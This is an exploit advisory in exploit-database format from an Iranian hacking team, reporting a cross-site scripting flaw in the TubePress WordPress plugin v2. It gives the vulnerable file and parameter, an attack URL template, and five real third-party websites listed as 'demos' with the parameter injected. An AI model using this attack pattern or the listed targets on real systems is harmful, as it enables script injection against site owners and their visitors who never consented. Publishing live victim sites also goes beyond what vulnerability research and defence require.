[^][^][^][^][^][^][^][^][^][^][^] [^] Exploit Title : Wordpress Tubepress Plugin v 2 Cross Site Scripting [^] Exploit Author : Ashiyane Digital Security Team [^] Vendor Homepage : https://wordpress.org/plugins/tubepress/ [^] Date: 13 Jan 2016 [^] Tested On : Win 10 | CyberFox Browser & Kali Linux | IceWeasel [^] [^][^][^][^][^][^][^][^][^][^][^] [^] Vulnerable PHP File = common/ui/popup.php OR common/popup.php [^] Vulnerable Parameter = name [^] [^] Attack Like :site/wp-content/plugins/tubepress/common/popup.php?name=[XSS] [^] [^][^][^][^][^][^][^][^][^][^][^] [^] Demos : [^] [^] http://inmafoundation.org/wp-content/plugins/tubepress/common/popup.php?name=Ashiyane [^] [^] http://www.frenzygraphics.com/wp-content/plugins/tubepress/common/popup.php?name=Ashiyane [^] [^] http://www.brothersgonnaworkitout.com/clientarea/greenparty/wp-content/plugins/tubepress/common/popup.php?name=Ashiyane [^] [^] http://www.twisters.info/wp-content/plugins/tubepress/common/popup.php?name=Ashiyane [^] [^] http://trueworldonline.com/wordpress/wp-content/plugins/tubepress/common/popup.php?name=Ashiyane [^] [^][^][^][^][^][^][^][^][^][^][^] [^] Discovered by : Ac!D [^] tnQ: EhSan D3s!6n37 ,H.empire , M.hidden , Linx64 , B0z0rgmehr , Maziar , N3TC@T [^] M.a.M.a.D , M.hacking , Sh.BlackHAT , V For vendetta , Sh.Cloner & Hassan [^][^][^][^][^][^][^][^][^][^][^]